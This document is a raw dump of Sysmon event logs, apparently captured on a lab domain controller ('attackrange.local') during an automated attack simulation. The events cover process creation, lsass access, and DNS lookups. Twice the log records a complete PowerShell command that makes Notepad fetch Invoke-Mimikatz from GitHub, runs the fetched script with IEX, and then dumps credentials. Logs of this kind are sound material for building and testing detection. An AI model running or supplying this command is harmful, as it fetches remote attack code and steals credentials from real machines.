22:53:35.582{05ADC7E1-706F-603D-5588-00000000AD01}41168712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wshom.ocx+b37c|C:\Windows\System32\wshom.ocx+b828|C:\Windows\System32\OLEAUT32.dll+2309f|C:\Windows\System32\OLEAUT32.dll+c2e5|C:\Windows\System32\OLEAUT32.dll+c836|C:\Windows\System32\wshom.ocx+cef3|C:\Windows\System32\wshom.ocx+8f8d|UNKNOWN(00007FF829924621) 154100x80000000000000001695611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.576{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXENotepadC:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr} 22542200x80000000000000001695610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:26.942{00000000-0000-0000-0000-000000000000}7076pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;<unknown process> 22542200x80000000000000001695609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:26.834{00000000-0000-0000-0000-000000000000}7076bit.ly0::ffff:67.199.248.10;::ffff:67.199.248.11;<unknown process> 23542300x80000000000000001695608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.473{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=561B16C585B47EF98D9BD11A729CEF40,SHA256=3217021C87A4D4F58DDA9831A8AFE7DBB9CB2E93EAC839B91C0301E2A0889111,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.364{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.364{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.327{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.327{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001695603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:53:35.301{05ADC7E1-706F-603D-5588-00000000AD01}4116\PSHost.132591128152149114.4116.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.286{05ADC7E1-706F-603D-5588-00000000AD01}4116ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3llev2ox.tqm.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.286{05ADC7E1-706F-603D-5588-00000000AD01}4116ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_da25lefg.ff4.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.270{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_da25lefg.ff4.ps12021-03-01 22:53:35.270 10341000x80000000000000001695599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.254{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 23542300x80000000000000001695596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17C381F51E4824D602C9D4E6B254554E,SHA256=485CB49708223452F55CC63572AF2A5797F50194CD6E2AAC2526FDAADAD51BBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.214{05ADC7E1-706F-603D-5588-00000000AD01}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.208{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001695586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.176{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=E034B639FD06D8BE47ED3BD328CA0578,SHA256=433FF713043217547E48416D4009C0E033A8632A30B33D3534902A097BCA16F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.114{05ADC7E1-706D-603D-5488-00000000AD01}7076ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.864{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=76932D842C6254E76571D577BEF7D41F,SHA256=B3A99D0E8EE6CE2C2357A613876AC9033906DBC4C9DCD7D3185AA3769D92B94B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.692{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 